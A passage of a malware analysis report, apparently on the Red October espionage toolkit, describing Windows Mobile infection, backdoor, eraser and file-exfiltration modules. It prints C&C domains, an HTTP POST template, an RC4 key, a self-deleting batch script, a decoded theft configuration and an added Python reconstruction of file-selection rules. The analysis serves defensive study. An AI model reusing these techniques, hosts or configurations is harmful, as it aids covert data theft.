If the XML provisioning doc was injected successfully, the module tries to install the so-called 'Zakladka' module under the name 'winupdate.dll'.

After 'Zakladka', the module injects the 'winupdate.cab' file, which is a provisioning XML file in an archive with a certificate inside. The certificate is Base64-encoded.

After 'winupdate.cab', the module injects the 'winupdate.cfg' file, a configuration file that contains mobile country codes with mobile network codes.

After 'winupdate.cfg', the module injects the 'calc.exe' file, an application for removing other modules from the Windows Mobile device.

The module then creates the backup file '\Windows\winupdate.dat' with 'zakladka' and the other Windows Mobile modules inside. The backup file is encrypted with RC4 and the key 'q12ioptyhednv347'.

The module creates WinUpdate.exe ('\Windows' folder, 'zakladka' inside) and WinUpdate.lnk ('\Windows\StartUp' folder).

After 'calc.exe', the module injects in sequence the 'word.exe', 'excel.exe', 'ppoint.exe', 'pdf_viewer.exe', 'wmplauer.exe', 'img.exe', 'iexplorer.exe' and 'wceloader.exe' modules and changes the file associations on the device, e.g. all Word files and other text documents will be opened with 'word.exe', all images with 'img.exe', etc.

The file 'pdf_viewer.exe' is an application for launching other Windows Mobile modules. After that, the module tries to launch 'pdf_viewer.exe' on the Windows Mobile device using the 'CeCreateProcess' API function from the rapi.dll library.

09b4f1e0c03d7dbdac402df4c0625167 (393216 bytes)

PE Exe file compiled with Microsoft Visual C++ 2005.

Creates mutex 'dfgbsdfjvabufqgwiffuvh4'.

Creates the log file '%%TMP%%\tmp_mu.%p.%p.dat' and writes 'Updater started, Version 1.0.0.0 s' to it. The module uses the same time/date format as the Nokia module ('year-month-date hours-minutes-seconds') after every new log entry.

Opens the event 'dfjsbnegisfgsafgdsgcxrte'. Initializes RAPI.dll and resolves the following API functions:

CeRegEnumKeyEx
CeRegEnumValue
CeWriteFile
CeCreateFile
CeReadFile
CeCreateProcess
CeCloseHandle
CeDeleteFile
CeGetLastError
CeRegQueryValueEx
CeRegCloseKey
CeRegCreateKeyEx
CeRegSetValueEx
CeRegOpenKeyEx
CeRapiUninit
CeRapiInitEx
CeRapiInit

Creates the thread 'dfjssdfgsdffgdsgcxrte' and a 'delex.bat' file in the TMP folder (for deleting itself if the mutex couldn't be created or after it has finished its work):

:Repeat
del 'path_to_itself'
if exist 'path_to_itself' goto Repeat
del "C:\DOCUME~1\'USER_NAME'\LOCALS~1\Temp\delex.bat"

Windows Mobile device thread

This module uses the WaitForSingleObject API function and waits for a device to be connected. If a device is connected, it writes 'Device connected' to the log file and calls a subroutine which initializes a connection and gets information such as the device's name, OS version and CLSID, all of which is written to the log file.

Injects the 'Update.exe' file into the '\Windows\' directory under the name 'Update.exe'. After that it tries to launch the file on the Windows Mobile device using the 'CeCreateProcess' API function from the rapi.dll library.

Windows Mobile files

Known variants

File name Internal name MD5 Compilation date Size (in bytes)

winupdate.dll zakladka 797541f87e2e3a9a0754a097772f3192 12:00:01, July 7, 2011 111944

calc.exe d41d8cd98f00b204e9800998ecf8427e 11:57:11, December 20, 2010 13824

excel.exe 93638cbba11d52b933d5da553048899e 11:57:10, December 20, 2010 7168

iexplorer.exe 06ff2157f98f312ceaa19cbef996660d 11:57:10, December 20, 2010 7168

img.exe 54c86037d2650630718180f24ce6f9d2 11:57:09, December 20, 2010 7168

pdf_viewer.exe 4af92c1758158644e50ddf32d9a74501 11:57:08, December 20, 2010 7168

powerpoint.exe e4c84caaf52b42d9615d2b35acda271a 11:57:09, December 20, 2010 7168

wceloader.exe 135eab2135cb589c655d75bc25921d8c 11:57:09, December 20, 2010 7168

wmplauer.exe da2ff3b983e24a49603d4ab61b0f05c3 11:57:09, December 20, 2010 7168

word.exe ea1e4cdf4072fd19fb97df2b7d88055a 11:57:08, December 20, 2010 7168

Update.exe 95914229c080a998b33d7dbcb199b231 14:01:15, October 19, 2010 59392

Backdoor component

File name: winupdate.dll

Internal name: zakladka

PE Exe file compiled with Microsoft Visual C++ 2005

Creates log file '\Temp\tmp%p.dat'.

Module loads XML provisioning doc (see above in Windows Mobile module for Windows).

The module obtains the MCC (Mobile Country Code) and MNC (Mobile Network Code) from the winupdate.cfg file on the infected device and writes this information to the log file.

In a C&C interaction loop the module tries to send a POST request to win-check-update.com (if that domain is unavailable, it sends the request to mobile-update.com):

POST %s HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0
Content-Length: %d
Host: %s

As the response from the remote server, the module receives a file which is stored as \Windows\%u.exe and executed.

C&Cs:

win-check-update.com
mobile-update.com

Eraser component

File name: calc.exe

PE Exe file compiled with Microsoft Visual C++ 2005

Creates the process 'MobileCalculator.exe'. Decrypts the file '\Windows\WinUpdate.dat' with the key 'q12ioptyhednv347'. Deletes the files 'word.exe', 'excel.exe', 'ppoint.exe', 'img.exe', 'wmplauer.exe', 'iexplorer.exe', 'wceloader.exe', 'pdf_viewer.exe' and 'WinUpdate.exe' from the '\Windows' directory. Retrieves the type and data from the '\System\Explorer\Shell Folders\StartUp\' registry key. Deletes the 'WinUpdate.lnk' file.

Launcher components

File names: pdf_viewer.exe, word.exe, excel.exe, iexplorer.exe, img.exe, powerpoint.exe, wceloader.exe, wmplauer.exe

All files are PE Exe files compiled with Microsoft Visual C++ 2005.

After launch, the module tries to configure the device with an XML provisioning document. All the values and fields in this XML (it is stored inside the file) are the same as in the Windows Mobile module for Windows.

After that it launches the Windows Mobile application wceload.exe (CAB installer) on the file winupdate.cab (previously uploaded to the device by the Windows module into the '\Windows' directory) with '/silent /noui'. These parameters make the installation completely hidden from the user.

Creates the registry key 'Services\Windows Update\' and registers the file '\Windows\winupdate.dll' as a service using the 'RegisterService' API function (which launches it).

Launches the 'calc.exe' (Remover) file from the '\Windows' directory. After that it launches the legitimate applications (such as pword.exe, pxl.exe, iexplore1.exe or others) which are associated with certain file types.

Updater component

File name: Update.exe

PE Exe file compiled with Microsoft Visual C++ 2005.

The module launches the Windows Mobile application wceload.exe (CAB installer) on the file '\Windows\cert.cab' with '/silent /noui'. These parameters make the installation completely hidden from the user.

10. Exfiltration group

WNFTPSCAN module

Known variants:

MD5 Compilation date (payload)

8bcd66ce8904e87f5cdfc1ad5b071ccb 2012.09.05 07:02:32 (GMT)

931391d484ff56b0a142f64ee47aff88 2012.09.05 07:02:32 (GMT)

Summary

The file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. All the functionality is implemented in the DllMain function.

This module is a simple non-interactive FTP client. It is used to go through all subdirectories on a specified FTP server, using credentials specified in a config/script stored in its resource section. The main purpose of this module is to make directory listings and copy files of interest (JPG, DOC, PPT, XLS, EMF, PDF) which are smaller than 1 MB and not older than a specified date. The module is also capable of checking whether remote FTP directories are writable, but this functionality is currently not used.

DllMain

When loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. The main function of the module is named "task_wnftpscan" and is registered in the framework. Then, it starts the framework's main loop, effectively parsing the resource data and executing the list of actions encoded in the resource.

The decoded resource data for the known sample can be represented as the following script:

SetOption(conn_a.VERSION_ID, [6] "51070")
SetOption(conn_a.VER_SESSION_ID, %removed%)
SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")
SetOption(conn_a.D_CONN, [65] "windowscheckupdate.com;windows-genuine.com;windowsonlineupdate.com")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_NAME, [15] "/cgi-bin/win/cab")
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] %removed% )
SetOption(conn_a.J_CONN, [65] "windowscheckupdate.com;windows-genuine.com;windowsonlineupdate.com")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_NAME, [15] "/cgi-bin/win/wcx")
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_USER, [21] %removed% )
SetOption(ftp_host, %removed% )
SetOption(ftp_port, %removed% )
SetOption(ftp_user, %removed% )
SetOption(ftp_pass, %removed% )
SetOption(ftp_crdir, "0" )
SetOption(ftp_getlist, "1" )
SetOption(ftp_max_file_size, "1000000" )
SetOption(ftp_min_file_size, "10" )
SetOption(ftp_file_time, "2012-10-30 00:00:00" )
SetOption(ftp_file_ac_re)
SetOption(ftp_ac_re, ".*\.jpg" )
SetOption(ftp_ac_re, ".*\.jpeg" )
SetOption(ftp_ac_re, ".*\.doc" )
SetOption(ftp_ac_re, ".*\.docx" )
SetOption(ftp_ac_re, ".*\.txt" )
SetOption(ftp_ac_re, ".*\.xls" )
SetOption(ftp_ac_re, ".*\.xlsx" )
SetOption(ftp_ac_re, ".*\.ppt" )
SetOption(ftp_ac_re, ".*\.pptx" )
SetOption(ftp_ac_re, ".*\.emf" )
SetOption(ftp_ac_re, ".*\.pdf" )
Call(task_wnftpscan)

Main function (task_wnftpscan)

The config defines the parameters for the method task_wnftpscan, which uses WinInet library functions to connect to the remote FTP server using the parameters set in the config and iterate through its directories.

It uses the PCRE library to check remote file extensions against the configured regular expressions (the ftp_ac_re options). The config option ftp_getlist=1 makes the code log every directory listing. The option ftp_crdir is set to 0, which prevents the code from checking whether write access is available; if it were set to 1 in the config, the module would try to create a "tmp" subdirectory in every remote directory it enters. There are max and min file size constraints, set to 1 MB and 10 bytes respectively.

Additionally there is a date constraint, set to 2012-10-30, indicating the earliest date of interest. It seems that the attackers had already fetched files before that date.

When writing to the in-memory logs the module prints a banner "FtpClient V4.0", which is probably an alternative name for the module, or else the code was reused from some other project. At the end of its work it adds "WMFTPSCAN END" to the log.

After collecting logs and fetching files in memory, the module compiles all the data together, compresses it using Zlib, encrypts it, encodes it with Base64 and uploads it to one of the command and control servers specified in the config.

This module doesn't change the registry, nor does it create any local files.

After completing FTP directory scanning and file retrieval, the module sends the logs and collected files to the C&C server. The connection options are retrieved from the configuration (resource):

Option name Description

D_CONN List of C&C domain names, separated by ';'

D_RPRT C&C server port

D_NAME Relative URL to send request to

The data sent to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.

GetFileReg module

Known variants (all share the same code section, differ in resources):

MD5 Compilation date (payload)

163CEE95FA3EF1469030F0BFEC0EB64C 2011.07.18 07:03:52 (GMT)

CC0F35631D7F69EB087F31754FA9635A 2011.07.18 07:03:52 (GMT)

E8711B9DBB3E7A6FBC1DF70F7131520C 2011.07.18 07:03:52 (GMT)

469F4B81A01B1577531812385CAC827E 2011.07.18 07:03:52 (GMT)

E8711B9DBB3E7A6FBC1DF70F7131520C 2011.07.18 07:03:52 (GMT)

A8B8F616FFD94D34E4E188657A5C8BA7 2011.07.18 07:03:52 (GMT)

E461B07E2A11ED13DDC0F27162545DE1 2011.07.18 07:03:52 (GMT)

The file is a PE DLL file with 0 exports, compiled with Microsoft Visual Studio 2008. All functionality is implemented in the DllMain function.

DllMain function

When loaded, the module deletes the file named "dump", then proceeds to its main function. After executing the main function, the module tries to delete the same file again.

Main function

First, the module initializes its main object and log headers, i.e.

@fileinforeg_log\GETFILEREG_STARTED_V1_%s.txt
@fileinforeg_log\GETFILEREG_V1_%s.txt

Then, it retrieves its resource of type "AAA" and name "BBB". The resource is expected to be an INI file compressed using Zlib. The module decompresses the data and parses the whole INI file. It extracts data from the following INI sections:

INI section name Description

i_getfile Directory traversal and file matching rules

Common On/off switches for features, global settings

conn_a C&C server connection parameters

keylogger Identified but not used

Common options

Option name Description

i_getfile_all_dbx Extract data from all files with 'dbx' extension (Outlook Express mail archives)

i_getfile_all_tbebat Extract data from all files with 'tbb' extension (The Bat mail archives)

i_getfile_all_thunderbird Extract data from all Thunderbird mail archives

i_getfile_all_disks Traverse all fixed and network disks

i_getfile_all_netdisks Traverse system network shares

i_getfile_all_netshared Traverse computer's network shares

f_time_min Minimum file creation or modification time to look for

f_time_max Maximum file creation or modification time to look for

f_total_send_size_max Global limit on the data to be sent to the C&C server

f_max_size Maximum file size to look for

f_min_size Minimum file size to look for

spec_check_task_existance_a Save the last traversal time value and modify the minimum file time option depending on that value

i_getfile options

The following options apply only to the "i_getfile" section they are specified in.

Option name Description

f_max_size Maximum file size to look for

f_min_size Minimum file size to look for

f_time_min Minimum file creation or modification time to look for

f_time_max Maximum file creation or modification time to look for

f_regexp_a Regular expression to match against the filename (must match)

f_regexp_d Regular expression to match against the filename (must not match, exclusion list)

f_search_path Directories to traverse

f_delete_file Delete the file after sending its contents to the C&C server

Conn_a options

Option name Description

D_CONN List of C&C server domain names, separated with ';'

D_NAME Relative URL

D_RPRT TCP port of the C&C server

D_SPRT Not used

D_USER Unique ID of the victim

D_MODE Not used

D_PASS Not used

J_CONN Not used

J_NAME Not used

J_RPRT Not used

J_SPRT Not used

J_USER Not used

J_MODE Not used

J_PASS Not used

VERSION_ID Sent to C&C

VER_SESSION_ID Not used

SEND_DELAY_TIME Not used

After parsing the INI file, the module tries to raise its privileges by logging on as a user with administrative rights. It looks for suitable credentials in an encrypted file named "adt.dat" in the directories with the following CSIDLs:

CSIDL_LOCAL_APPDATA (%LOCALAPPDATA%, %USERPROFILE%\AppData\Local)
CSIDL_COMMON_APPDATA (%ALLUSERSPROFILE%)

The module sends several types of packets to the C&C server.

The first packet is sent after the configuration is read; it contains the string "===" and starts with the string "Subject: Reflebt".

Intermediate packets are sent whenever a traversal operation is finished; they also contain the contents of the internal log file and start with the string "Subject: Refleut".

The contents of the stolen files are sent in separate packets, split into chunks of 511950 bytes (regular files) or 512000 bytes (e-mails), starting with the string "Subject: Refleut".

The final packet is sent after all operations are completed; it contains the string "===" and starts with the string "Subject: Refleet".

The data sent to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.

Directory traversal

Depending on the configuration file, the module may traverse different directories:

For each "i_get_file" configuration section, the module traverses the directories named in the "f_search_path" values of the same section.

If the "i_getfile_all_disks" global option is set, the module traverses all fixed and mounted network drives.

If the "i_getfile_all_netdisks" global option is set, the module searches for available network shares and tries to mount the "\\%computer%\%drive%$" system shares for drive names from 'C' to 'F', then traverses these shares.

If the "i_getfile_all_netshared" global option is set, the module searches for all available network shares and traverses them.

The directories are traversed recursively, with a hardcoded depth limit of 100.

The global option "spec_check_task_existance_a" modifies the traversal and matching rules for local and network disks. If this option is set, the module tracks the time of the last traversal of each disk in a file named "%DRIVE%\System Restore\System Restore Point". This file is then used to correct the minimum file creation/modification rules so that the module skips the files that it should have already processed.

File matching rules

The module applies the same matching routine to all files found while traversing the disks, folders and network shares.

For each file, the module checks that the file's creation and modification times satisfy both the minimum and maximum configuration values, that its size is within the allowed range, and that the filename is matched by at least one "f_regexp_a" regular expression and is not matched by any "f_regexp_d" regular expression. If the file's properties satisfy all the requirements, the file is sent to the C&C server.

Special processing is applied to e-mail databases. The module can parse Outlook Express databases ("dbx" files), The Bat databases ("tbb" files) and Thunderbird message storages. Depending on the configuration options, these files may be read and processed, and the extracted e-mail messages are then sent to the C&C server.

After all operations are completed, the module sends the final C&C request with string "Subject: Refleet" and returns.

FileInfo module

Known variants (all share the same code section, differ in resources):

MD5 Compilation date (payload)

C9686F76F827D8B16C434C84FDF9BE06 09.10.2012 5:49

B6F2D2D27A91D99AB396AD7A4B4937DE 09.10.2012 5:49

AC83001F4228D92F1457E5841792EAC1 09.10.2012 5:49

Summary

The file is a PE DLL file with 2 exported functions, compiled with Microsoft Visual Studio 2010. All functionality is implemented in the "START" function. The module is very similar to the "GetFileReg" module. It is stored on disk as an encrypted file that is loaded by the "Scheduler" module.

Creates encrypted log files: "%TMP%\smrdprev\smrdprev_%p_%p.tmp", where the "%p" parameters are formatted from the return values of subsequent GetTickCount API calls.

Creates encrypted storage files: "%TEMP%\%08 hex digits%hst", where the 8 hex digits represent the CRC32 checksum of the current user's name.

Creates mutex: "Win32Wbem32Prefetchfamt"

START function

When started, the module initializes its log object with a new filename using the format string "%TMP%\smrdprev\smrdprev_%p_%p.tmp", and sets the log header:

@LOG\FILEINFOAMT_1

Then, it creates four data collection and directory traversal objects and loads the configuration INI file. The configuration file is loaded from the resource of type "BBB", name "AAA" and is decrypted using a custom AMPRNG cipher with a hardcoded key.

The code of the module appears to be a new version or a fork of the "GetFileReg" module, as are the configuration options extracted from the INI file.

INI section name Description

i_getfile Directory traversal and file matching rules

Common On/off switches for features, global settings

conn_a C&C server connection parameters, not used

Keylogger Identified but not used

net_res_acl (new in 'fileinfo') Network share traversal and matching rules

Common options

Option name Description

i_process_all_net_res (new in 'fileinfo') When turned on, only the 'host_d' exclusion list is applied. When turned off, only network paths matching 'host_a' are processed.

i_getfile_all_dbx Extract data from all files with 'dbx' extension (Outlook Express mail archives)

i_getfile_all_tbebat Extract data from all files with 'tbb' extension (The Bat mail archives)

i_getfile_all_thunderbird Extract data from all Thunderbird mail archives

i_getfile_all_disks Traverse all fixed and network disks

Page 113: Red october. detailed malware description

i_getfile_all_netdisks Traverse system network shares

i_getfile_all_netshared Traverse computer's network shares

f_time_min Minimum file creation or modification time to look for

f_time_max Maximum file creation or modification time to look for

f_total_send_size_max Global limit on the data to be sent to the C&C server

f_use_hash_storage (new in'fileinfo')

Store MD5 hashes of files and e-mails that were already processed, skipalready processed items

f_max_size Maximum file size to look for

f_min_size Minimum file size to look for

spec_check_task_existance_a Save last traversal time value and modify minimum file time optiondepending that value

log_level (new in 'fileinfo') Level of log verbosity: 'normal', 'quiet', 'extend'

process_ldisks_sleep (new in'fileinfo') Delay between each traversal, 'PROC_LDISKS'

process_ndisks_sleep (new in'fileinfo') Delay between each traversal, 'PROC_NDISKS'

process_nshare_sleep (newin 'fileinfo') Delay between each traversal, 'PROC_NSHARES'

process_spaths_sleep (newin 'fileinfo') Delay between each traversal, 'PROC_SPATHS'

i_getfile options

The following options apply only to the "i_getfile" section in which they are specified.

Option name                                   Description
f_use_hash_storage (new in 'fileinfo')        The same as in the 'Common' section
f_max_size                                    Maximum file size to look for
f_min_size                                    Minimum file size to look for
f_time_min                                    Minimum file creation or modification time to look for
f_time_max                                    Maximum file creation or modification time to look for
f_regexp_a                                    Regular expression to match against the filename (must match)
f_regexp_d                                    Regular expression to match against the filename (must not match, exclusion list)
f_search_path                                 Directories to traverse
f_delete_file                                 Delete the file after sending its contents to the C&C server

net_res_acl options (new in "fileinfo")

Option name   Description
host_a        Regular expression of network locations that should be traversed
host_d        Regular expression of network locations that should not be traversed (exclusion list)


Then, the module starts four threads and assigns each traversal object to a thread. Every thread has a distinct scope of subjects to process:

1. Directories shared over the network, called "PROC_SHARES"
2. Disks shared over the network, called "PROC_NDISKS"
3. Search paths specified in "i_getfile" sections, called "PROC_SPATHS"
4. Local disks, called "PROC_LDISKS"

The actual file matching and directory traversal code is almost identical to the one implemented in "GetFileReg". There are only minor updates to the algorithm:

- Remote directory and disk paths are matched against the "host_a" or "host_d" regular expressions. A remote location is traversed only if the "host_a" regular expression matches, or if "i_process_all_net_res" is set and the location is not matched by any of the "host_d" regular expressions.
- Remote disks are enumerated from "C$" to "Z$".
- If the "f_use_hash_storage" option is turned on, the module creates a binary hash storage in a file named "%TEMP%\<8 hex digits>hst", where the 8 hex digits are the CRC32 checksum of the current user's name. It populates that storage with information about every processed file, including file size, creation date and the MD5 hash of the file's name. The module checks every new file against this hash storage, and skips files that were already processed.
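Reconstructing the selection logic lets an incident responder estimate, from a recovered configuration, which files on a host or share fell within the module's collection scope. The following is an added example written for this page, not the module's own code: it parses a constructed INI in the shape the tables describe, implements the net_res_acl decision (following the option table's wording where it and the algorithm text differ), the i_getfile name, size and time filters, and an in-memory model of the hash storage that makes a second pass skip already processed files. The date format, the override order between the "i_getfile" and "Common" sections, keeping a file when either of its two timestamps lies in the window, and the UTF-16LE encoding of the file name before MD5 are this example's assumptions; all paths, patterns and limits in the INI and the file listing are made up.

```python
import configparser
import hashlib
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed configuration in the shape the report describes: section and option
# names are the report's, every value (paths, patterns, limits) is made up here.
CONSTRUCTED_INI = r"""
[Common]
i_process_all_net_res = 0
f_use_hash_storage = 1
f_min_size = 1
f_max_size = 5000000
f_time_min = 2012-01-01
f_time_max = 2012-12-31

[i_getfile]
f_regexp_a = \.(doc|xls|pdf|txt)$
f_regexp_d = ~\$|\.tmp$

[net_res_acl]
host_a = ^\\\\fileserver\d+\\
host_d = ^\\\\backup
"""


@dataclass
class FileRecord:  # metadata of one candidate file; constructed, no real file is read
    path: str
    size: int
    created: datetime
    modified: datetime


def load_config(text):
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    return cfg


def network_location_in_scope(path, cfg):
    """net_res_acl decision: with i_process_all_net_res off only host_a matches are
    traversed; with it on only the host_d exclusion list applies (option table)."""
    acl = cfg["net_res_acl"]
    host_a, host_d = acl.get("host_a", fallback=""), acl.get("host_d", fallback="")
    if cfg["Common"].getboolean("i_process_all_net_res", fallback=False):
        return not (host_d and re.search(host_d, path, re.IGNORECASE))
    return bool(host_a and re.search(host_a, path, re.IGNORECASE))


def _option(cfg, name):
    # i_getfile value first, then the Common value (this override order is assumed).
    value = cfg["i_getfile"].get(name, fallback=None)
    return value if value is not None else cfg["Common"].get(name, fallback=None)


def file_in_scope(rec, cfg):
    """i_getfile decision: name must match f_regexp_a and not f_regexp_d, size must lie
    in [f_min_size, f_max_size], and the creation or the modification time must lie in
    [f_time_min, f_time_max] (the YYYY-MM-DD format is the example's choice)."""
    name = rec.path.rsplit("\\", 1)[-1]
    include, exclude = _option(cfg, "f_regexp_a"), _option(cfg, "f_regexp_d")
    if include and not re.search(include, name, re.IGNORECASE):
        return False
    if exclude and re.search(exclude, name, re.IGNORECASE):
        return False
    lo_size, hi_size = _option(cfg, "f_min_size"), _option(cfg, "f_max_size")
    if (lo_size and rec.size < int(lo_size)) or (hi_size and rec.size > int(hi_size)):
        return False
    t_min, t_max = _option(cfg, "f_time_min"), _option(cfg, "f_time_max")
    lo = datetime.strptime(t_min, "%Y-%m-%d") if t_min else datetime.min
    hi = datetime.strptime(t_max, "%Y-%m-%d") if t_max else datetime.max
    return any(lo <= t <= hi for t in (rec.created, rec.modified))


def hash_storage_key(rec):
    # The report: the storage records file size, creation date and the MD5 of the
    # file's name. Encoding the name as UTF-16LE before MD5 is an assumption.
    name = rec.path.rsplit("\\", 1)[-1]
    return (rec.size, rec.created.date(), hashlib.md5(name.encode("utf-16-le")).hexdigest())


def select_files(records, cfg, seen):
    """Paths one traversal pass would collect; the set `seen` models the hash storage."""
    use_storage = cfg["Common"].getboolean("f_use_hash_storage", fallback=False)
    selected = []
    for rec in records:
        if not file_in_scope(rec, cfg):
            continue
        if use_storage:
            key = hash_storage_key(rec)
            if key in seen:
                continue
            seen.add(key)
        selected.append(rec.path)
    return selected


# Constructed directory listing; the comment names the rule that decides each file.
CONSTRUCTED_FILES = [
    FileRecord(r"D:\Projects\budget.xls", 40000, datetime(2012, 3, 1), datetime(2012, 3, 5)),    # collected
    FileRecord(r"D:\Projects\~$budget.xls", 162, datetime(2012, 3, 5), datetime(2012, 3, 5)),    # f_regexp_d
    FileRecord(r"D:\Projects\notes.txt", 0, datetime(2012, 2, 1), datetime(2012, 2, 1)),         # f_min_size
    FileRecord(r"D:\Projects\archive.pdf", 9000000, datetime(2012, 4, 1), datetime(2012, 4, 1)), # f_max_size
    FileRecord(r"D:\Projects\old.doc", 3000, datetime(2009, 1, 1), datetime(2009, 1, 1)),        # f_time_min
    FileRecord(r"D:\Projects\photo.jpg", 3000, datetime(2012, 5, 1), datetime(2012, 5, 1)),      # f_regexp_a
    FileRecord(r"D:\Projects\plan.doc", 12000, datetime(2012, 6, 1), datetime(2012, 6, 2)),      # collected
]
```

Running select_files twice with the same `seen` set shows the effect of "f_use_hash_storage": the second pass returns nothing, which is why a recovered hash storage file is itself a record of what the module already handled on that host.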

Since traversal routines are now executed in separate threads, the "fileinfo" module introduces a continuous mode of operation. Four options control this behavior, each corresponding to one thread:

process_ldisks_sleep
process_ndisks_sleep
process_nshare_sleep
process_spaths_sleep

The directory traversal threads run their code in infinite loops, and the "sleep" values specify the delay in milliseconds that should pass between iterations.

Data exfiltration

Although the module extracts the C&C server information from its configuration file, it does not interact with the C&C server in any way. All information, including collected file names and contents, is stored in its encrypted log files ("%TMP%\smrdprev\smrdprev_%p_%p.tmp").